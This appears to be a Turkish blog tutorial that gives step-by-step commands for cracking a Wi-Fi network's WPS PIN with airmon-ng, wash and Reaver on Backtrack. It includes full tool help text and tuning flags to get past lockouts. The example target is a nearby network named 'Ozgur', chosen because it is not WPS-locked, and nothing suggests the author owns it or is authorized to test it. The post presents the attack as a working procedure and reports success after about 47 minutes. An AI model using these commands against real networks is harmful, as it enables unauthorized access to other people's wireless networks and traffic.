WPS ile Wireless Hack (WPA-WPA2)
WPS(Wi-Fi Protected Setup) son dönemlerde sıkça kullanılmaya başlayan, modemlere getirilen ek bir özellik. Yeni nesil modemlerin bazılarının üzerinde WPS tuşu ile wireless modeminize bağlanmak mümkün. Fakat WPS’in güvenliği için sekiz haneli bir pin kullanılıyor. Bu da ister istemez güvenlikçilerin iştahını kabartmış.Tactical Network Solutions diye bir ekip/firma Reaver adında bir linux paketi yayınlayarak ; modem şifresini WPS-Pin kod numarasını brute-force ederek çok daha kısa zamanda kırmayı başarmışlar. Daha fazla teknik detay için şuradaki dökümandan faydalanabilirsiniz.
Bu program WPA-WPA2 şifresi denemeden direk WPS pini ile giriş yapıyor. WPS şuan pek yaygın olmadığı için WPS’i desteklemeyen modemler için eski yollardan devam etmek zorunda kalınabilir… Örnek saldırımızı Backtrack üzerinde yapacağız,malzeme listesi önceki yazılarda bulunabilir… Sırayla ilerleyelim ;
Adım 1:
iwconfig
Adım 2:
airmon-ng start wlan0
Adım 3:
apt-get install reaver
Bu adımda reaver’i internetden download ediyoruz.Zaten kuruluysa sıkıntı yok…
Adım 4:
wash -i (monitor) -C
Yukarıda ki kod WPS destekli wireless modemleri göstermektedir. Burada önemli olan seçilecek hedefin ‘WPS Locked’ özelliğinin kapalı olması ve bize en yakın mesafe de olan modemin tercih edilmesi. Bu iki unsuru göz önüne alırsak; bizim hedefimiz: ‘Ozgur’.
Wash ile ilgili daha detaylı kullanım için;
Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> Required Arguments: -i, --interface=<iface> Interface to capture packets on -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files Optional Arguments: -c, --channel=<num> Channel to listen on [auto] -o, --out-file=<file> Write data to file -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15] -D, --daemonize Daemonize wash -C, --ignore-fcs Ignore frame checksum errors -5, --5ghz Use 5GHz 802.11 channels -s, --scan Use scan mode -u, --survey Use survey mode [default] -h, --help Show help Example: wash -i mon0
Adım 5:
Bu adımda Reaver’i kullanıyoruz. Kullandığımız komut aşağıdaki gibidir.
reaver -i (monitor) -b (Modem_Mac) -vv --dh-small
60 saniye bekleme hatası alıyorsanız aşağıdaki gibi bir komut işinize yarayabilir;
reaver -i mon0 -b [BSSID] --lock-delay=250
Daha detaylı Reaver komutları için ;
Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> Required Arguments: -i, --interface=<wlan> Name of the monitor-mode interface to use -b, --bssid=<mac> BSSID of the target AP Optional Arguments: -m, --mac=<mac> MAC of the host system -e, --essid=<ssid> ESSID of the target AP -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f) -o, --out-file=<file> Send output to a log file [stdout] -s, --session=<file> Restore a previous session file -C, --exec=<command> Execute the supplied command upon successful pin recovery -D, --daemonize Daemonize reaver -a, --auto Auto detect the best advanced options for the target AP -f, --fixed Disable channel hopping -5, --5ghz Use 5GHz 802.11 channels -v, --verbose Display non-critical warnings (-vv for more) -q, --quiet Only display critical messages -h, --help Show help Advanced Options: -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin -d, --delay=<seconds> Set the delay between pin attempts [1] -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60] -g, --max-attempts=<num> Quit after num pin attempts -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0] -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts -t, --timeout=<seconds> Set the receive timeout period [5] -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20] -A, --no-associate Do not associate with the AP (association must be done by another application) -N, --no-nacks Do not send NACK messages when out of order packets are received -S, --dh-small Use small DH keys to improve crack speed -L, --ignore-locks Ignore locked state reported by the target AP -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet -n, --nack Target AP always sends a NACK [Auto] -w, --win7 Mimic a Windows 7 registrar [False] Example: reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
Yazdığımız komut ile seçtiğimiz hedefe yönelik saldırı başlatıyoruz…
Yazdığınız komutu özelleştirmek isterseniz; yukarıda ki seçeneklerle birlikte kendinize göre uygun olan fonksiyonları seçebilirsiniz.
Saldırının ilk dakikalarından…Pin’ler deneniyor ve tahmini ilerleme süresi gösteriliyor…Bu adımdan sonra yapılacak tek şey beklemek…
Ve yaklaşık 47 dk sonunda sonuç ortada 🙂
Bazı modemlerin default WPS şifrelerini bilmek/hesaplamak mümkün bu sayede süreyi 5 sn’ye kadar düşürebilirsiniz.Bunun için şuradaki yazıya bakabilirsiniz.